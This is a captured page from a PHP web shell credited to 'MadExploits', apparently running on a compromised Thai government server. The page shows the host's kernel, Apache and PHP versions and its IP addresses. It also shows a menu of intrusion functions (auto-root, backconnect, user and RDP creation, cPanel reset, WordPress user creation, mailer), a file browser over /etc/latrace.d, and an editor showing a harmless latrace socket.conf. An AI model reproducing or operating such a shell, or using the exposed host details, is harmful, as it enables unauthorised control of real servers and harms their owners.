Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
latrace.d /
[ HOME SHELL ]
Name
Size
Permission
Action
sysdeps
[ DIR ]
drwxr-xr-x
ctype.conf
392
B
-rw-r--r--
dirent.conf
825
B
-rw-r--r--
dlfcn.conf
417
B
-rw-r--r--
fcntl.conf
643
B
-rw-r--r--
getopt.conf
273
B
-rw-r--r--
inet.conf
655
B
-rw-r--r--
ioctl.conf
68
B
-rw-r--r--
libintl.conf
651
B
-rw-r--r--
libio.conf
646
B
-rw-r--r--
locale.conf
286
B
-rw-r--r--
misc.conf
292
B
-rw-r--r--
mman.conf
976
B
-rw-r--r--
ncurses.conf
10.77
KB
-rw-r--r--
netdb.conf
3.84
KB
-rw-r--r--
pthread.conf
7.51
KB
-rw-r--r--
pwd.conf
869
B
-rw-r--r--
resource.conf
2.24
KB
-rw-r--r--
signal.conf
2.56
KB
-rw-r--r--
socket.conf
3.29
KB
-rw-r--r--
stat.conf
1.6
KB
-rw-r--r--
stdio.conf
3.85
KB
-rw-r--r--
stdlib.conf
6.18
KB
-rw-r--r--
string.conf
2.77
KB
-rw-r--r--
syslog.conf
198
B
-rw-r--r--
term.conf
934
B
-rw-r--r--
termios.conf
671
B
-rw-r--r--
time.conf
1.6
KB
-rw-r--r--
typedefs.conf
472
B
-rw-r--r--
unistd.conf
4.3
KB
-rw-r--r--
utmp.conf
564
B
-rw-r--r--
wait.conf
419
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : socket.conf
/* /usr/include/sys/socket.h */ enum PF_TYPE { PF_UNIX = 1, /* Unix domain sockets */ PF_LOCAL = 1, /* POSIX name for AF_UNIX */ PF_INET = 2, /* Internet IP Protocol */ PF_AX25 = 3, /* Amateur Radio AX.25 */ PF_IPX = 4, /* Novell IPX */ PF_APPLETALK = 5, /* AppleTalk DDP */ PF_NETROM = 6, /* Amateur Radio NET/ROM */ PF_BRIDGE = 7, /* Multiprotocol bridge */ PF_ATMPVC = 8, /* ATM PVCs */ PF_X25 = 9, /* Reserved for X.25 project */ PF_INET6 = 10, /* IP version 6 */ PF_ROSE = 11, /* Amateur Radio X.25 PLP */ PF_DECnet = 12, /* Reserved for DECnet project */ PF_NETBEUI = 13, /* Reserved for 802.2LLC project*/ PF_SECURITY = 14, /* Security callback pseudo AF */ PF_KEY = 15, /* PF_KEY key management API */ PF_NETLINK = 16, PF_ROUTE = 16, /* Alias to emulate 4.4BSD */ PF_PACKET = 17, /* Packet family */ PF_ASH = 18, /* Ash */ PF_ECONET = 19, /* Acorn Econet */ PF_ATMSVC = 20, /* ATM SVCs */ PF_RDS = 21, /* RDS sockets */ PF_SNA = 22, /* Linux SNA Project (nutters!) */ PF_IRDA = 23, /* IRDA sockets */ PF_PPPOX = 24, /* PPPoX sockets */ PF_WANPIPE = 25, /* Wanpipe API Sockets */ PF_LLC = 26, /* Linux LLC */ PF_CAN = 29, /* Controller Area Network */ PF_TIPC = 30, /* TIPC sockets */ PF_BLUETOOTH = 31, /* Bluetooth sockets */ PF_IUCV = 32, /* IUCV sockets */ PF_RXRPC = 33, /* RxRPC sockets */ PF_ISDN = 34, /* mISDN sockets */ PF_PHONET = 35 /* Phonet sockets */ }; enum SOCK_TYPE { SOCK_STREAM = 1, SOCK_DGRAM = 2, SOCK_RAW = 3, SOCK_RDM = 4, SOCK_SEQPACKET = 5, SOCK_DCCP = 6, SOCK_PACKET = 10 }; int socket(int domain = PF_TYPE, int type = SOCK_TYPE, int protocol); int socketpair(int domain = PF_TYPE, int type = SOCK_TYPE, int protocol, void *fds); int bind(int fd, void *addr, socklen_t len); int getsockname(int fd, void *addr, socklen_t *len); int connect(int fd, void *addr, socklen_t len); int getpeername(int fd, void *addr, socklen_t *len); size_t send(int fd, void *buf, size_t n, int flags); size_t recv(int fd, void *buf, size_t n, int flags); size_t sendto(int fd, void *buf, size_t n, int flags, void *addr, socklen_t addr_len); size_t recvfrom(int fd, void *buf, size_t n, int flags, void *addr, socklen_t *addr_len); size_t sendmsg(int fd, void *message, int flags); size_t recvmsg(int fd, void *message, int flags); int getsockopt(int fd, int level, int optname, void *optval, socklen_t *optlen); int setsockopt(int fd, int level, int optname, void *optval, socklen_t optlen); int listen(int fd, int n); int accept(int fd, void *addr, socklen_t *addr_len); int shutdown(int fd, int how); int sockatmark(int fd); int isfdtype(int fd, int fdtype);
Close